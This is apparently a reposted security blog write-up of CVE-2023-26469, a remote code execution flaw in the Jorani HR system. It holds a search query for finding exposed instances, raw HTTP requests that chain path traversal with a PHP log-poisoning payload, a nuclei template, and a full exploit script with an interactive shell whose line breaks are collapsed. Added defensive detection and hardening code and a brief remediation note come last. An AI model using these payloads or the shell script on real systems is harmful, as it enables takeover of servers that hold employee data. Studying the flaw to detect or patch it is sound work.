Jorani Remote Command Execution Vulnerability: One-Click Remote Control (CVE-2023-26469)





01

Vulnerability name

Jorani remote command execution vulnerability

02

Affected versions

Jorani < 1.0.2



03

Vulnerability description

Jorani is an open-source human resources (HR) management system designed to help organisations manage employee leave, absence, overtime and other personnel tasks. It provides a user-friendly web interface through which employees and managers can submit, approve and track leave requests, and it also offers HR functions such as employee record management and report generation. In Jorani 1.0.0, an attacker can use path traversal to access files and execute code on the server.


04

FOFA search query

title="Jorani"



05

Reproduction

Step 1: request /session/login on the lab target to obtain the cookies.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The response is shown below; the csrf_cookie_jorani value is reused in the following requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: send the following POST request to the lab target; the login field carries a PHP snippet that executes the base64-decoded value of a custom request header.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Step 3: send the following request to the lab target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.


GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

The response packet follows; it contains uid=33(www-data) gid=33(www-data) groups=33(www-data).

HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 7043
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:29 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:29 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:29 GMT; Max-Age=7200; path=/; HttpOnly

<!DOCTYPE html><html lang="../../application/logs"><head> <meta name="viewport" content="width=device-width, initial-scale=1"> ...ERROR - 2023-10-24 11:33:37 --> {controllers/session/login} Invalid login id or password for user=---------uid=33(www-data) gid=33(www-data) groups=33(www-data)---------

This proves the command executed successfully.
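From the defender's side, the three requests above have a recognisable shape: a login POST whose language field traverses into application/logs and whose login field contains a PHP tag, followed by a GET to /pages/view/log-YYYY-MM-DD carrying an ad-hoc header with a base64 command. The Python below is an added example written for this article (it is not code from the original post, from the nuclei template, or from the Orange Cyberdefense exploit): it flags those stages in parsed requests, finds planted PHP tags in an application log, and recognises leaked id output in a response. The sample body, headers and log lines are constructed from the values shown in the walkthrough; the function names and finding codes are my own.

```python
"""Defender-side checks for the CVE-2023-26469 chain (added example; the
sample data below is constructed from the values shown in the walkthrough)."""
import base64
import binascii
import re
from urllib.parse import unquote_plus

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")                      # checked after URL-decoding
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)   # '<?php' or '<?='
LOG_VIEW_RE = re.compile(r"^/pages/view/log-\d{4}-\d{2}-\d{2}$")
ODD_HEADER_RE = re.compile(r"^[A-Z0-9]{8,}$")                # ad-hoc names like K1SYJPMHLU4Z
CMD_OUTPUT_RE = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+")    # output of `id`


def _parse_form(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body on '&' only and
    percent-decode each side. Done by hand so that ';' inside a PHP payload
    is never treated as a pair separator."""
    form = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        form[unquote_plus(key)] = unquote_plus(value)
    return form


def _is_base64_text(value: str) -> bool:
    """True if value is strict base64 that decodes to printable ASCII text."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 8 and all(32 <= b < 127 for b in raw)


def inspect_request(method: str, path: str, headers: dict, body: str = "") -> list:
    """Return finding codes for one request, in the order they are detected."""
    findings = []
    if method.upper() == "POST" and path == "/session/login":
        form = _parse_form(body)
        if TRAVERSAL_RE.search(form.get("language", "")):
            findings.append("traversal_in_language")   # stage 1: escape into application/logs
        if PHP_TAG_RE.search(form.get("login", "")):
            findings.append("php_in_login")            # stage 1: payload written into the log
    if method.upper() == "GET" and LOG_VIEW_RE.match(path):
        findings.append("log_view_access")             # stage 2: log file served via pages/view
        for name, value in headers.items():
            if ODD_HEADER_RE.match(name) and _is_base64_text(value):
                findings.append("suspicious_cmd_header")  # stage 2: base64 command in a header
                break
    return findings


def find_poisoned_log_lines(log_text: str) -> list:
    """Forensics: (line_no, line) for application-log lines holding a PHP tag."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if PHP_TAG_RE.search(line)]


def response_shows_command_output(body: str) -> bool:
    """True if a response body carries the output of `id` (i.e. execution worked)."""
    return CMD_OUTPUT_RE.search(body) is not None


# Constructed samples modelled on the walkthrough's requests and log line.
SAMPLE_POST_BODY = (
    "csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin"
    "&language=..%2F..%2Fapplication%2Flogs"
    "&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z']))"
    "{system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>"
    "&CipheredValue=DummyPassword"
)
SAMPLE_GET_HEADERS = {
    "Host": "192.168.190.30",
    "Cookie": "csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77",
    "K1SYJPMHLU4Z": "ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=",
    "X-REQUESTED-WITH": "XMLHttpRequest",
}
SAMPLE_LOG = (
    "ERROR - 2023-10-24 11:30:02 --> {controllers/session/login} Invalid login id or password for user=alice\n"
    "ERROR - 2023-10-24 11:33:37 --> {controllers/session/login} Invalid login id or password "
    "for user=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>\n"
)

if __name__ == "__main__":
    print(inspect_request("POST", "/session/login", {}, SAMPLE_POST_BODY))
    print(inspect_request("GET", "/pages/view/log-2023-10-24", SAMPLE_GET_HEADERS))
    print([n for n, _ in find_poisoned_log_lines(SAMPLE_LOG)])
```

The form parser splits on & only because the PHP payload contains semicolons, which some generic query-string parsers historically treated as a second separator; splitting on semicolons would hide the <?php tag from the check. On a live system the first two finding codes in one session, followed by the log-view access, is a strong signal; a PHP tag in application/logs is the artefact to look for afterwards.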



06

nuclei PoC

nuclei already ships a PoC for this vulnerability.

The core of the PoC is as follows:

id: CVE-2023-26469

info:
  name: Jorani 1.0.0 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
  remediation: |
    Upgrade Jorani to a patched version or apply the necessary security patches.
  metadata:
    verified: true
    max-request: 3
    vendor: jorani
    product: jorani
    shodan-query: http.favicon.hash:-2032163853
  tags: cve,cve2023,jorani,rce,packetstorm

variables:
  cmd: "id"
  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>"
  header: "{{to_upper(rand_base(12))}}"

http:
  - raw:
      - |
        GET /session/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /session/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword

      - |
        GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
        Host: {{Hostname}}
        X-REQUESTED-WITH: XMLHttpRequest
        {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - 'uid=(\d+)(.*?) gid=(\d+)(.*?) groups=([\d,]+)(.*?)'

      - type: status
        part: header_3
        status:
          - 401

    extractors:
      - type: regex
        part: body
        group: 1
        internal: true
        name: csrf
        regex:
          - 'name="csrf_test_jorani" value="(.*?)"'
# digest: 4a0a004730450221008f4bc6475a44cede273521c31f6ca4732c6f9d7ca427b5f10f43ed1dfbb7343a02205247e6f125d2dbaab76d7cce782dc77567ec7a7675b8425fea61f8c666a511ea:922c64590222798bb761d5b6d8e72950

Running the PoC:

.\nuclei.exe -t C:\Users\DELL\nuclei-templates\http\cves\2023\CVE-2023-26469.yaml -l .\1.txt




07

One-click remote control

There is an open-source exploit on GitHub:

https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py

Run it with:

python CVE_Jorani.py https://192.168.190.30

The exploit file contains the following:

"""vulnerability covered by CVE-2023-26469"""import readlineimport requestsimport datetimeimport sysimport reimport base64import randomimport string
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
msg = lambda x,y="n":print(f'x1b[92m[+]x1b[0m {x}', end=y)err = lambda x,y="n":print(f'x1b[91m[x]x1b[0m {x}', end=y)log = lambda x,y="n":print(f'x1b[93m[?]x1b[0m {x}', end=y)
CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')CMD_PATTERN = re.compile('---------(.*?)---------', re.S)
URLS = { 'login' : '/session/login', 'view' : '/pages/view/',}
alphabet = string.ascii_uppercaseHEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))
BypassRedirect = { 'X-REQUESTED-WITH' : 'XMLHttpRequest', HEADER_NAME : ""}
INPUT = "x1b[92mjrjgjkx1b[0m@x1b[41mjoranix1b[0m(PSEUDO-TERM)n$ " # The input used for the pseudo term
u = lambda x,y: x + URLS[y]
POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"PATH_TRAV_PAYLOAD = "../../application/logs"
if __name__ == '__main__': print(""" /!\ Do not use this if you are not authorized to /!\ """) log("POC made by @jrjgjk (Guilhem RIOUX)", "nn")
if(len(sys.argv) == 1): err(f"Usage: {sys.argv[0]} <url>") exit(0)
log(f"Header used for exploit: {HEADER_NAME}")
t = sys.argv[1]
s = requests.Session() log("Requesting session cookie") res = s.get(u(t,"login"), verify = False)
C = s.cookies.get_dict()
Date = datetime.date.today() log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"
csrf_token = re.findall(CSRF_PATTERN, res.text)[0] log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'") log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'") msg(f"Recoveredd CSRF Token: {csrf_token}")
data = { "csrf_test_jorani" : csrf_token, "last_page" : "session/login", "language" : PATH_TRAV_PAYLOAD, "login" : POISON_PAYLOAD, "CipheredValue" : "DummyPassword" }
s.post(u(t,"login"), data=data)
log(f"Accessing log file: {log_file_name}")
exp_page = t + URLS['view'] + log_file_name
### Shell cmd = "" while True: cmd = input(INPUT) if(cmd in ['x', 'exit', 'quit']): break elif(cmd == ""): continue else: BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;") res = s.get(exp_page, headers=BypassRedirect) cmdRes = re.findall(CMD_PATTERN, res.text) try: print(cmdRes[0]) except: print(res.text) err("Wow, there was a problem, are you sure of the URL ??") err('exiting..')        exit(0)


08

Remediation

Upgrade to the latest version.
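The root cause the description gives is a user-controlled language value that is turned into a filesystem path, and the chain also depends on the submitted login name being written verbatim into a log file that is later served back through /pages/view/. As an added, generic Python illustration (not Jorani's PHP code; the install root, language directory and language allowlist are assumptions made for this example), the following shows the concatenation pattern that lets ../../application/logs escape the language directory, beside a hardened resolver and a log sanitiser that neutralises PHP tags before attacker-controlled text reaches a log file.

```python
"""Vulnerable path building vs. a hardened resolver, plus log sanitising.
Generic illustration of the CVE-2023-26469 root cause; not Jorani's own code.
"""
import os
import re

# Assumed layout for this example only: <root>/application/language/<lang>/
ROOT_DIR = os.path.join(os.sep, "var", "www", "jorani")
LANGUAGE_DIR = os.path.join(ROOT_DIR, "application", "language")
ALLOWED_LANGUAGES = {"english", "french", "german", "spanish"}  # assumed allowlist
LANGUAGE_NAME_RE = re.compile(r"^[a-z]{2,16}$")


def is_within(path: str, directory: str) -> bool:
    """True if path resolves to directory itself or something beneath it."""
    directory = os.path.realpath(directory)
    path = os.path.realpath(path)
    return os.path.commonpath([directory, path]) == directory


def vulnerable_language_path(language: str) -> str:
    """Before: the submitted value is joined straight onto the directory, so
    'language=../../application/logs' resolves outside LANGUAGE_DIR."""
    return os.path.normpath(os.path.join(LANGUAGE_DIR, language))


def hardened_language_path(language: str) -> str:
    """After: shape check, allowlist, and a containment check on the resolved
    path (the last one is defence in depth; the allowlist alone already
    rejects every traversal string)."""
    if not LANGUAGE_NAME_RE.match(language) or language not in ALLOWED_LANGUAGES:
        raise ValueError(f"unsupported language: {language!r}")
    resolved = os.path.realpath(os.path.join(LANGUAGE_DIR, language))
    if not is_within(resolved, LANGUAGE_DIR):
        raise ValueError("language path escapes the language directory")
    return resolved


def rejects(language: str) -> bool:
    """Helper for checks: True if the hardened resolver refuses the value."""
    try:
        hardened_language_path(language)
    except ValueError:
        return True
    return False


def sanitize_for_log(value: str, max_len: int = 64) -> str:
    """Neutralise user input before it is written to a log that might later be
    served or included: drop non-printable characters, escape '<' and '>' so a
    '<?php' tag cannot survive, and truncate so a log line cannot carry a
    sizeable payload."""
    value = "".join(ch for ch in value if ch.isprintable())
    value = value.replace("<", "\\x3c").replace(">", "\\x3e")
    return value[:max_len]


if __name__ == "__main__":
    traversal = "../../application/logs"
    print(vulnerable_language_path(traversal), is_within(vulnerable_language_path(traversal), LANGUAGE_DIR))
    print(rejects(traversal), hardened_language_path("english"))
    print(sanitize_for_log("<?php system('id'); ?>"))
```

The containment check uses realpath on both sides so that a symlinked install root is compared consistently; an allowlist alone is the simpler and sufficient fix for a value that only ever names one of a handful of language directories.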



Originally published on the WeChat public account AI与网安: Jorani Remote Command Execution Vulnerability: One-Click Remote Control (CVE-2023-26469)

Copyright notice: published by admin on 25 October 2023 at 8:01 am.
Please credit when reposting: Jorani Remote Command Execution Vulnerability: One-Click Remote Control (CVE-2023-26469) | CTF导航
